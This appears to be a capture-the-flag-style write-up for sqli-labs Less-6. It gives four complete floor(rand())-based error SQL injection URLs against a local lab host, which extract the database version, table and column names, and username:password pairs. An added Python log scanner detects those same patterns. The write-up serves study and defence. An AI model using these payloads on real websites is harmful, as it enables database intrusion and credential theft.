Less-6
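(1) Determine how the injection point is closed
Adding different special characters shows that a double quote produces an error message, so the parameter is closed with a double quote.
(2) Error-based injection
Because the page does not echo query results, error-based injection is the more convenient approach.
I tried the error-based methods from the end of the previous level and found that only the floor error is echoed, so that is the method used here:
# Query database information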
http://192.168.88.133/mysqli-labs/Less-6/?id=1" union select count(*),0,concat(database(),0x7e,version(),floor(rand(0)*2)) x from information_schema.tables group by x --+
# Query table names
http://192.168.88.133/mysqli-labs/Less-6/?id=1" union select count(*),0,concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)) x from information_schema.tables group by x --+
# Query column names
http://192.168.88.133/mysqli-labs/Less-6/?id=1" union select count(*),0,concat((select column_name from information_schema.columns where table_name='users' limit 0,1),floor(rand(0)*2)) x from information_schema.tables group by x --+
# Query the data
http://192.168.88.133/mysqli-labs/Less-6/?id=1" union select count(*),0,concat((select concat(username,0x3a,password ) from users limit 1,1),floor(rand(0)*2)) x from information_schema.tables group by x --+
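From the defender's side, the requests above leave a recognisable trace in the web server's access log. The following is an added example, not part of the original write-up: a small log scanner that flags the double-quote closure probe and the floor(rand()) ... group by pattern. It assumes a combined-format access log; the sample lines are constructed and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /mysqli-labs/Less-6/?id=1 HTTP/1.1" 200 721',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /mysqli-labs/Less-6/?id=1%22 HTTP/1.1" 200 812',
    '10.0.0.9 - - [01/Jan/2024:10:00:31 +0000] "GET /mysqli-labs/Less-6/?id=1%22%20union%20select%20'
    'count(*),0,concat(database(),0x7e,version(),floor(rand(0)*2))%20x%20from%20'
    'information_schema.tables%20group%20by%20x%20--+ HTTP/1.1" 200 799',
    '10.0.0.7 - - [01/Jan/2024:10:01:02 +0000] "GET /shop/?q=floor+lamp+group+discount HTTP/1.1" 200 1502',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SIGNALS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "floor_rand": re.compile(r"\bfloor\s*\(\s*rand\s*\("),
    "group_by": re.compile(r"\bgroup\s+by\b"),
    "information_schema": re.compile(r"\binformation_schema\b"),
    "trailing_comment": re.compile(r"(?:--\s|#)\s*$"),
}

def signals_for(value):
    """Return the set of signal names found in one URL-decoded parameter value."""
    text = re.sub(r"\s+", " ", value.lower())   # normalise case and whitespace
    found = {name for name, rx in SIGNALS.items() if rx.search(text)}
    if text.count('"') % 2 == 1:                # odd count: value closes a "..." literal
        found.add("unbalanced_double_quote")
    return found

def verdict(found):
    if {"floor_rand", "group_by"} <= found:
        return "floor-error-injection"
    if found == {"unbalanced_double_quote"}:
        return "closure-probe"
    return "suspicious" if found else "clean"

def scan(lines):
    hits = []                                   # (client, path, verdict, signals)
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        params = parse_qsl(url.query, keep_blank_values=True)
        found = set().union(*(signals_for(v) for _, v in params))
        if found:
            hits.append((client, url.path, verdict(found), sorted(found)))
    return hits
```

Running scan(SAMPLE_LOG) reports the second and third requests and leaves the benign "floor lamp" search unflagged.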
Note: there are more methods you can try for yourself! Corrections and discussion are welcome.